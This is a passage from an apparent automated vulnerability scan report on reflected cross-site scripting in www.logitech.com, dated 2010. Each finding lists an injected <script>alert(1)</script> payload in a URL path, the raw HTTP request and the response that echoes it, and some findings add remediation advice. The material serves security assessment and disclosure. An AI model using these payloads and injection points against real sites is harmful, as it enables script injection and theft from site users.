Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2f5b35"><script>alert(1)</script>64bd4772672/cmn">
...[SNIP]...

1.121. http://www.logitech.com/css/v2/cmn/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73b37"><script>alert(1)</script>aa30ad21361 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/cmn73b37"><script>alert(1)</script>aa30ad21361/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn73b37"><script>alert(1)</script>aa30ad21361">
...[SNIP]...

1.122. http://www.logitech.com/css/v2/cmn/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30e09</script><script>alert(1)</script>9011e9a300b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn30e09</script><script>alert(1)</script>9011e9a300b/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn30e09</script><script>alert(1)</script>9011e9a300b' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.123. http://www.logitech.com/css/v2/cmn/global.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/global.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d232e</script><script>alert(1)</script>51d6d4a1ebd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn/global.cssd232e</script><script>alert(1)</script>51d6d4a1ebd HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:32 GMT
Connection: keep-alive
Content-Length: 31435


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn/global.cssd232e</script><script>alert(1)</script>51d6d4a1ebd' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.124. http://www.logitech.com/css/v2/cmn/global.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/global.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50dc6"><script>alert(1)</script>7338e131cc7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/cmn/global.css50dc6"><script>alert(1)</script>7338e131cc7 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:25 GMT
Connection: keep-alive
Content-Length: 31403


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn/global.css50dc6"><script>alert(1)</script>7338e131cc7">
...[SNIP]...

1.125. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7309b</script><script>alert(1)</script>1ad8e92000f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css7309b</script><script>alert(1)</script>1ad8e92000f/v2/cmn/navigation/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css7309b</script><script>alert(1)</script>1ad8e92000f/v2/cmn/navigation' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech
...[SNIP]...

1.126. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 937d4"><script>alert(1)</script>4335ca57442 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css937d4"><script>alert(1)</script>4335ca57442/v2/cmn/navigation/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css937d4"><script>alert(1)</script>4335ca57442/v2/cmn/navigation">
...[SNIP]...

1.127. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8eec</script><script>alert(1)</script>b6e93325230 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2d8eec</script><script>alert(1)</script>b6e93325230/cmn/navigation/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2d8eec</script><script>alert(1)</script>b6e93325230/cmn/navigation' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.co
...[SNIP]...

1.128. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9683"><script>alert(1)</script>63cacfcbc63 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2a9683"><script>alert(1)</script>63cacfcbc63/cmn/navigation/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2a9683"><script>alert(1)</script>63cacfcbc63/cmn/navigation">
...[SNIP]...

1.129. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c80</script><script>alert(1)</script>51c42a7cc8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn49c80</script><script>alert(1)</script>51c42a7cc8e/navigation/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn49c80</script><script>alert(1)</script>51c42a7cc8e/navigation' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,
...[SNIP]...

1.130. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d633"><script>alert(1)</script>622f6629e8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/cmn2d633"><script>alert(1)</script>622f6629e8d/navigation/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn2d633"><script>alert(1)</script>622f6629e8d/navigation">
...[SNIP]...

1.131. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eef9f"><script>alert(1)</script>ec6502349e2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/cmn/navigationeef9f"><script>alert(1)</script>ec6502349e2/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn/navigationeef9f"><script>alert(1)</script>ec6502349e2">
...[SNIP]...

1.132. http://www.logitech.com/css/v2/cmn/navigation/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99a20</script><script>alert(1)</script>dde550d6d7a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn/navigation99a20</script><script>alert(1)</script>dde550d6d7a/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn/navigation99a20</script><script>alert(1)</script>dde550d6d7a' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.133. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96b74"><script>alert(1)</script>044deb99727 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css96b74"><script>alert(1)</script>044deb99727/v2/cmn/navigation/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css96b74"><script>alert(1)</script>044deb99727/v2/cmn/navigation/bg-nav-headers">
...[SNIP]...

1.134. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be33f</script><script>alert(1)</script>9f6cd5ee0e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssbe33f</script><script>alert(1)</script>9f6cd5ee0e7/v2/cmn/navigation/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','cssbe33f</script><script>alert(1)</script>9f6cd5ee0e7/v2/cmn/navigation/bg-nav-headers' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip
...[SNIP]...

1.135. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8352b</script><script>alert(1)</script>b6ca9ac0cdd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v28352b</script><script>alert(1)</script>b6ca9ac0cdd/cmn/navigation/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v28352b</script><script>alert(1)</script>b6ca9ac0cdd/cmn/navigation/bg-nav-headers' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','
...[SNIP]...

1.136. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e66a"><script>alert(1)</script>ad553a5b31a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v27e66a"><script>alert(1)</script>ad553a5b31a/cmn/navigation/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v27e66a"><script>alert(1)</script>ad553a5b31a/cmn/navigation/bg-nav-headers">
...[SNIP]...

1.137. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2172b</script><script>alert(1)</script>ec6039f9226 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn2172b</script><script>alert(1)</script>ec6039f9226/navigation/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
